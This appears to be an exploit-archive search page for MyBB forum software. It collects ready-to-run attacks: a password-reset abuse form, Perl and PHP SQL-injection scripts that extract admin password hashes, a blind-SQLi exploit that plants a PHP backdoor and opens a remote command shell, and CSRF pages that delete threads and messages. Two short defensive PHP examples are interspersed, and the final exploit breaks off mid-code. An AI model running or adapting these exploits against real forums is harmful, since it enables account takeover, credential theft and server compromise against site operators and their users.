mybb
Search result for 'mybb'
HACKERS PAL/mybb-change.txt ( na)
Hello,
Mybb Change Password Vulnerability
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
If you can use the debug mode, you will be able to change the password of any user by knowing the registered email address.
Enter the email in the HTML code below after changing website and mybb_dir to the real values, then enter any user's email address.
Look at query number 12, or search for awaitingactivation; you will find something like:
INSERT INTO mybb123_awaitingactivation (uid, dateline, code, type) VALUES ('1', 'XXXX', 'ADbSXnoM', 'p')
--- >> ('1', 'XXXX', 'ADbSXnoM', 'p')
1 is the userid, XXXX is the time,
ADbSXnoM is the change-password verification code,
'p' is the type, which means password change.
<<<HTM EXPLOIT
<form action="http://website/mybb_dir/member.php?debug=1" method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td wlign=center>
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>
>>>
GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;
End of it :)
WwW.SoQoR.NeT
MyBB suffers from a change password vulnerability.
Alberto Trivero/mybb.pl.txt ( na)
#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit shows the MD5 hashed password of the user id you've chosen
# Related advisory:
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182
use LWP::Simple;
print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";
if(!$ARGV[0] or !$ARGV[1]) {
print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
exit(0);
}
$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
MyBB versions 1.00 RC4 and below remote password hash extraction exploit.
Breeeeh/mybb111.txt ( na)
----------------------------------
Found By: Breeeeh & CrAzY CrAcKeR
Site: www.alshmokh.com
Email:Breeeeh@hotmail.com
----------------------------------
$query = $db->query("SELECT * FROM ".TABLE_PREFIX."forums f WHERE 1=1 $forumlist");
$comma = " - ";
while($forum = $db->fetch_array($query))
{
$title .= $comma.$forum['name'];
$forumcache[$forum['fid']] = $forum;
$comma = ", ";
----------------------------------
Example:
/rss.php?...$comma=[SQL]
mybb version 1.1.1 suffers from a SQL injection vulnerability in rss.php.
DarkFig/mybb-exec.txt ( na)
#!/usr/bin/php
<?php
/**
* This file requires the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
# http://www.milw0rm.com/exploits/2012
# They fixed a lot of (but not all) the SQL queries that use the ipaddress, with $db->escape_string.
# They did not fix the function itself (a choice ... a bad one) and they forgot to fix one (only one) SQL query.
# They should fix the problem at the source =)
#
if($argc < 3)
{
print("
--- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit ---
-----------------------------------------------------------------------
PHP conditions: none
Credits: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
Usage: $argv[0] -url http://victim.com/ [Options]
Params: -url For example http://victim.com/myBB/
Options: -debug Debug mod activated (debug_mybb.html)
-truetime Server response time which returns true
-benchmark You can change the value used in benchmark()
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentication <proxyuser:proxypwd>
Note: If you have some problems use -debug, -benchmark, -truetime
-----------------------------------------------------------------------
");exit(1);
}
$url = getparam('url',1);
$debug = (getparam('debug')!='') ? 1 : 0;
$benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000';
$proxy = getparam('proxy');         # option names must be passed as strings, like the others above
$proxyauth = getparam('proxyauth');
$backdoor = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php
$filetoed = 'index.lang.php';
$xpl = new phpsploit();
$xpl->agent('Firefox');
if($proxy) $xpl->proxy($proxy);
if($proxyauth) $xpl->proxyauth($proxyauth);
if($debug) debug(1);
# There are two ways to get logged in as administrator.
#
# SOLUTION NUMBER 1
# mysql> select * from mybb_users\G
# *************************** 1. row ***************************
# uid: 1
# username: root
# password: 39ac8681f5cf4fcd9c9c09719a618bd3
# salt: BFeJBOCF
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...
#
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# SOLUTION NUMBER 2
# mysql> select * from mybb_adminsessions\G
# *************************** 1. row ***************************
# sid: 81e267263b9254f3aaf670383bfbfec9
# uid: 1
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA
# ip: 127.0.0.1
# dateline: 1175443967
# lastactive: 1175444369
#
# $xpl->addheader('Client-IP','127.0.0.1');
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...
#
# I decided to use the solution number 2.
# We can also add an administrator (easily) ... but it's not interesting.
#
print "\nAdmin IP : "; $ip = sql_inject('ip');
print "\nAdmin sid: "; $sid = sql_inject('sid');
print "\nTrying to be logged in as administrator";
$xpl->addheader('Client-IP',$ip);
$xpl->get($url."admin/languages.php?adminsid=$sid");
# Trying to find the language
if(preg_match('#<input type="hidden" name="lang" value="(\S*)"#',$xpl->getcontent(),$langmatches)) $lang=$langmatches[1];
else $lang='english';
print "\nLanguage: $lang";
# Language configuration
$xpl->get($url."admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed");
preg_match_all('#name="(.*)">(.*)</textarea>#',$xpl->getcontent(),$name_value);
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
#
$PHPCODE = '${${error_reporting(0)}}'
.'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}'
.'${${fwrite($handle,'.chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>').')}}'
.'${${fclose($handle)}}';
$name_value[2][0] .= $PHPCODE;
$postdata=array(frmdt_url => $url.'admin/languages.php',
"adminsid" => $sid, "action" => "do_edit",
"lang" => $lang, "editwith" => 0,
"inadmin"=> 0, "file"=> $filetoed,
"Update Language Variables"=>" Update Language Variables");
for($i=0;$i<count($name_value[1]);$i++) $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]);
# print $xpl->showlastrequest();
$xpl->formdata($postdata);
# Trying to execute the php code
$xpl->get($url.'index.php');
# If not the default language
$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed);
print "\nThe php file should be created\n\$shell> ";
# Hello master
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
# ');include('../../inc/config.php');print $config['password'];//
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url.$backdoor);
print $xpl->getcontent()."\n\$shell> ";
}
function sql_inject($field)
{
global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
$sub=0;$string='';
if($field=='ip') {$a='44';$b='57';} # . 0-9
else {$a='46';$b='70';} # 0-9 A-Z
while(TRUE)
{
$sub++;
for($i=$a;$i<=$b;$i++)
{
# Random ip
$fakeip = rand(128,254).'.'
.rand(128,254).'.'
.rand(128,254).'.'
.rand(128,254);
# Calculation of the server response time which returns TRUE
if($i==$a) $f='TST';
# End of the string ?
elseif($i==($a+1)) $f='NULL';
# Test the char
else $f=$i;
# Table prefix
if($sub==1 AND $i==$a)
{
$xpl->addheader('Client-IP',$fakeip."'<script>alert(666)</script>");
$xpl->get($url.'index.php');
if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];
else $prefix='mybb_';
}
# +-class_session.php (#2)
# |
# 475. function create_session($uid=0)
# 476. {
# 477. global $db;
# 478. $speciallocs = $this->get_special_locations();
# 479.
# 480. // If there is a proper uid, delete by uid.
# 481. if($uid > 0)
# 482. {
# 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);
# 484. $onlinedata['uid'] = $uid;
# 485. }
# 486. // Else delete by ip.
# 487. else
# 488. { // $this->ipaddress = get_ip();
# 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");
# 490. $onlinedata['uid'] = 0;
# 491. }
#
$sql = $fakeip."' OR ip=(SELECT IF(SUBSTR(";
$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";
$sql .= ($f=='TST') ? ",1" : ",$sub";
$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";
$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";
# +-functions.php (#1)
# |
# 1836. function get_ip()
# 1837. {
# 1838. if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
# 1839. {
# 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))
# 1841. {
# 1842. foreach($addresses[0] as $key => $val)
# 1843. {
# 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))
# 1845. {
# 1846. $ip = $val;
# 1847. break;
# 1848. }
# 1849. }
# 1850. }
# 1851. }
# 1852. if(!isset($ip))
# 1853. {
# 1854. if(isset($_SERVER['HTTP_CLIENT_IP']))
# 1855. {
# 1856. $ip = $_SERVER['HTTP_CLIENT_IP'];
# 1857. }
# 1858. else
# 1859. {
# 1860. $ip = $_SERVER['REMOTE_ADDR'];
# 1861. }
# 1862. }
# 1863. return $ip;
# 1864. }
#
$bef = time();
$xpl->reset('header');
$xpl->addheader('Client-IP',$sql);
$xpl->get($url.'index.php');
$aft = time();
if($f=='TST') $truetime=$aft-$bef;
if(getparam('truetime')!='') $truetime=getparam('truetime');
# Server response time >= Server response time which returns TRUE ?
$restime = $aft-$bef;
if($restime >= $truetime AND $f != 'TST') $result='TRUE';
else $result='FALSE';
# Debug mode activated
if($debug) debug('',$field);
# The tested char returns TRUE
if($result=='TRUE')
{
if($f!='NULL')
{
# Continue
print strtolower(chr($f));
$string .= chr($f);
break;
}
else
{
# End of the string
$xpl->reset('header');
return $string;
}
}
# Retry if no char found
if($f==$b) $sub--;
}
}
}
function debug($init='',$dafield='')
{
global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip
if($init)
{
$handle = fopen("debug_mybb.html","w+");
$data = "<h1><div align='center'>MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit</div></h1>
<pre><table width='0' border='1' align='center' cellspacing='0'><tr>
<td align='center'><b>REQUEST TIME</b></td>
<td align='center'><b>RESPONSE TIME</b></td>
<td align='center'><b>TRUETIME</b></td>
<td align='center'><b>BENCHMARK</b></td>
<td align='center'><b>RESULT</b></td>";
# <td align='center'><b>IP</b></td>
$data .= "<td align='center'><b>FIELD</b></td>
<td align='center'><b>CHARSET</b></td>
<td align='center'><b>SUBSTR()</b></td>
<td align='center'><b>ORD()</b></td>
<td align='center'><b>CHAR()</b></td>";
fwrite($handle,$data);
fclose($handle);
}
else
{
$handle = fopen("debug_mybb.html","a");
$data = "<tr".(($result=='TRUE') ? " bgcolor='#FFFF00'" : "").">
<td align='center'>&nbsp;".htmlentities($bef)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($aft)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($truetime)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($benchmark)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($result)."&nbsp;</td>";
# <td align='center'>&nbsp;".htmlentities($fakeip)."&nbsp;</td>
$data .= "<td align='center'>&nbsp;".htmlentities($dafield)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities("$a-$b")."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($sub)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities($f)."&nbsp;</td>
<td align='center'>&nbsp;".htmlentities(chr($f))."&nbsp;</td></tr>";
fwrite($handle,$data);
fclose($handle);
}
}
function chrit($string)
{
$char = '';
for($i=0;$i<strlen($string);$i++)
{
$char .= 'chr('.ord($string[$i]).')';
$char .= ($i != (strlen($string)-1)) ? '.' : '';
}
return $char;
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) {
if(!empty($argv[$value+1])) return $argv[$value+1];
else return 1;
}
}
if($opt) exit("\n-$param parameter required");
else return;
}
?>
MyBulletinBoard aka MyBB versions 1.2.3 and below remote code execution exploit.
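The exploit above depends on two weak spots visible in the MyBB code it quotes: get_ip() returns whatever the client puts in Client-IP or X-Forwarded-For, and create_session() concatenates that value into a DELETE statement. The following is an added example (not MyBB's or DarkFig's code) of how a defender hardens both steps: honour forwarding headers only when the direct peer is a configured trusted proxy, accept only syntactically valid addresses, and bind the value as a query parameter. The trusted-proxy address and the request arrays are constructed for the demo.

```php
<?php
// Added example (not MyBB code): hardened client-IP handling for the two weak
// spots the exploit relies on, get_ip() trusting any Client-IP / X-Forwarded-For
// header and create_session() concatenating that value into SQL.
// Assumption: the operator knows the address of the reverse proxy in front of the app.
const TRUSTED_PROXIES = ['10.0.0.5'];   // constructed value for this demo

/**
 * Return the client IP, or null if even REMOTE_ADDR is unusable.
 * Forwarding headers are consulted only when the direct peer is a trusted
 * proxy, and every candidate must pass FILTER_VALIDATE_IP, so a header such
 * as "1.2.3.4' OR 1=1 #" can never reach the database.
 */
function safe_get_ip(array $server, array $trusted = TRUSTED_PROXIES): ?string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    if (!in_array($remote, $trusted, true)) {
        return $remote;                 // direct connection: ignore forwarding headers
    }
    // Behind a trusted proxy the right-most X-Forwarded-For entry was appended
    // by that proxy; earlier entries (and Client-IP) are attacker-controlled.
    $parts = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? ''));
    $candidate = end($parts);
    if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
        return $candidate;
    }
    return $remote;                     // proxy sent nothing usable: fall back to the peer
}

/**
 * Build the session clean-up statement with a bound parameter instead of the
 * string concatenation used in create_session(). Returns [$sql, $params] for
 * a prepare()/execute() pair; nothing from the request is interpolated.
 */
function session_delete_by_ip(string $prefix, string $ip): array
{
    return ["DELETE FROM {$prefix}sessions WHERE ip = ?", [$ip]];
}

// Constructed requests for the demo.
$injected = "1.2.3.4' OR 1=1 #";

// 1. Direct client forges Client-IP: the header is never looked at.
var_dump(safe_get_ip(['REMOTE_ADDR' => '203.0.113.7', 'HTTP_CLIENT_IP' => $injected]));

// 2. Same request through the trusted proxy, with junk prepended to
//    X-Forwarded-For: only the proxy-appended address is accepted.
var_dump(safe_get_ip([
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => "$injected, 198.51.100.9",
]));

// 3. The value that does reach SQL is bound, not spliced into the string.
var_dump(session_delete_by_ip('mybb_', '198.51.100.9'));
```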
NBBN/mybb-disclose.txt ( na)
##################################################################################
# MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN (http://nbbnsblog.co.cc) #
##################################################################################
Vendor: http://mybboard.net
Date: November 25, 2008
These URLs contain "my_post_key". Moderators and admins use these sometimes, depending on what they want to do with a thread. my_post_key is used to perform various actions and to prevent CSRF. These pages show the posts of the users. If some of these posts have pictures, the referrer will be transferred to the server of the images.
#####Vuln URLs#################################################################################
http://localhost/mybb/moderation.php?action=mergeposts&tid=1&modtype=thread&my_post_key=[key] #
http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=[key] #
http://localhost/mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=[key] #
############################################################################################
Finally, an attacker has the postkey, and can perform some interesting moderator or administrator actions with CSRF.
MyBB versions 1.4.3 suffers from a disclosure vulnerability relating to my_post_key that allows for cross site request forgery attacks.
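As a defensive check for the leak described above, here is an added example (not NBBN's or MyBB's code) that scans web-server access-log lines for GET requests carrying my_post_key in the query string: those are the links that expose the anti-CSRF token in the Referer of every embedded image request, and the ones to convert into POST forms. The log lines are constructed, in Apache combined format.

```php
<?php
// Added example (not MyBB code): report GET requests that carry my_post_key in
// the URL, since a token in the query string travels in the Referer header to
// any third-party host that serves an image on the resulting page.
// Constructed log lines (Apache combined format) for the demo:
$log = <<<'LOG'
192.0.2.10 - - [25/Nov/2008:10:00:01 +0000] "GET /mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=0123456789abcdef0123456789abcdef HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Nov/2008:10:00:03 +0000] "GET /mybb/showthread.php?tid=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
192.0.2.11 - - [25/Nov/2008:10:00:05 +0000] "POST /mybb/moderation.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [25/Nov/2008:10:00:09 +0000] "GET /mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=0123456789abcdef0123456789abcdef HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
LOG;

/**
 * Return one record per GET request whose query string contains my_post_key:
 * ['ip' => ..., 'path' => ..., 'action' => ..., 'key' => masked token].
 * POST requests are skipped: their token lives in the body, not the URL.
 */
function find_token_in_url(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $parts = parse_url($m[2]);
        parse_str($parts['query'] ?? '', $q);
        if (!isset($q['my_post_key'])) {
            continue;
        }
        $hits[] = [
            'ip'     => $m[1],
            'path'   => $parts['path'] ?? '',
            'action' => $q['action'] ?? '',
            // never copy a live token into a report; keep a short fingerprint only
            'key'    => substr($q['my_post_key'], 0, 4) . '...',
        ];
    }
    return $hits;
}

foreach (find_token_in_url($log) as $hit) {
    printf("%s %s action=%s key=%s\n", $hit['ip'], $hit['path'], $hit['action'], $hit['key']);
}
```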
NBBN/mybb-xsrf.txt ( na)
####################################################
Found: 18 January 2008
Found by: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################
####1) Delete Threads XSRF Vulnerability:
<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>
</body>
</html>
###Poc:
1. Create a .html file and copy the code into it.
2. Upload the file and now send the link to an admin or moderator
3. Done
####2) Delete PM's XSRF Vuln:
This one works via a plain GET request, with no confirmation prompt:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
###Poc: (An easy way):
1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done
MyBulletinBoard aka MyBB versions 1.2.11 and below suffer from cross site request forgery vulnerabilities.
Devil-00/mybbSQLinject.txt ( na)
Hello
The Injected File : search.php
Discovered by: HACKERS PAL & Devil-00 & ABDUCTER
Injected Versions :-
Powered by MyBulletinBoard 1.00 Release Candidate 4
Powered by MyBulletinBoard 1.00 Release Candidate 3
Powered by MyBulletinBoard 1.00 Release Candidate 2
Powered by MyBulletinBoard 1.00 Release Candidate 1
And The Last Versions
The Code For The Vul:-
search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4/*
The Exploit in Perl :-
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victim.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victim.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "###################################################################\n";
exit;
}
my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];
if($ARGV[3] eq 0){
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="member\.php\?action=profile&amp\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
-=-=-=-=-
Thanks For Devil-00 & ABDUCTER
MyBulletinBoard (MyBB) versions 1.00 RC1 through RC4 suffer from SQL injection flaws. Perl exploit included.
scottm/mybbSQL.txt ( na)
Description:
MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. MyBB has been designed with the end users in mind, you and your subscribers. Full control over your discussion system is presented right at the tip of your fingers, from multiple styles and themes to the ultimate customisation of your forums using the template system.
Exploit:
MyBB is prone to an SQL injection within the uid parameter of member.php; a UNION-based attack can be used to obtain the admin password hash. The appropriate cookies can then be edited to allow admin panel access.
Proof of concept:
<?php
// the example below will attack http://www.example.com/mybb/
echo 'Pass:' . get_pass('www.example.com', '/mybb', '');
function get_pass($host, $path, $dbprefix) {
$query[] = 'uid=' . urlencode ("1' UNION SELECT 10000, 200, password AS type FROM {$dbprefix}users WHERE uid=1 ORDER BY uid DESC/*");
$query = implode('&', $query);
$header = "POST $path/member.php?action=avatar HTTP/1.1\r\n";
$header .= "Host: $host\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: " . strlen($query) . "\r\n\r\n";
$fp = fsockopen($host, 80, $errno, $errstr, 30);
fwrite($fp, $header . $query);
$allah = '';
while (!feof($fp)) {
$tmp = fgets($fp, 1024);
$allah .= $tmp;
}
fclose($fp);
preg_match('/\: ([a-z0-9]{32})/i', $allah, $matches);
if (empty($matches[1]) && empty($dbprefix)) {
preg_match('#FROM (\w+)avatars WHERE#i', $allah, $matches);
$dbprefix = $matches[1];
if (empty($dbprefix)) {
return 'Unable to obtain password';
}
$password = get_pass($host, $path, $dbprefix);
}
else {
$password = $matches[1];
}
return $password;
}
?>
MyBB is prone to a SQL injection attack within the uid parameter of member.php. The flaw allows for retrieval of the admin password hash. Sample exploit provided.
W7ED/mybbSQL.pl.txt ( na)
#!/usr/bin/perl -w
use LWP::Simple;
## Victim ##
if(!$ARGV[0]){
print "############# MyBB Member.php SQL Injection ##############\n";
print "## Coded By #\n";
print "#########################################################\n";
print "## [+] Bug By W7ED - W7ED[at]hotmail.com #\n";
print "#########################################################\n";
print "# Exmp:- perl file.pl mybb.net /mybb userid #\n";
print "#########################################################\n";
exit;
}
###########
my $host = 'http://'.$ARGV[0];
## User ID ##
if(!$ARGV[1]){
$ARGV[1] = 1;
}
#############
my $userid = $ARGV[1];
print "[*] Trying $host\n";
## Forum Path ##
if(!$ARGV[2]){
$ARGV[2] = '/';
}
################
$url = "$ARGV[2]/member.php?action=profile&uid=lastposter&fid=-1,') UNION SELECT password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password,password FROM users WHERE uid=$userid/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/mySQL error: 1054<br>Unknown column '(.*?)'/ && print "[+] User ID Is $userid And Hash Is : $1\n";
print "[-] Unable to retrieve Hash\n" if(!$1);
MyBulletinBoard (MyBB) member.php SQL injection exploit.
c411k/mybb1211-sql.txt ( na)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit written by c411k (no one-symbol brute force: the hash is inserted into your PM in a single action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin_sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin_loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08
error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);
header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
margin="5";
FONT-WEIGHT: normal;
COLOR: #B9B9BD;
BACKGROUND: #44474F;
FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body>
<?php
function myflush($timee)
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
}
if (!$_GET)
{
echo
'<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value=" get admin passwd... "><br><br>
<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
<font color="#B9B9BD"> ¬ for example "expdb.cc"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
<font color="#B9B9BD"> ¬ path to the mybb forum, for example "community/mybb"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
<font color="#B9B9BD"> ¬ your username on this forum, for example "c411k"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
<font color="#B9B9BD"> ¬ your password, for example "h1world"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
<font color="#B9B9BD"> ¬ admin id, default 1<br>
</form>';
}
if (isset($_GET['fuck_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';
function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
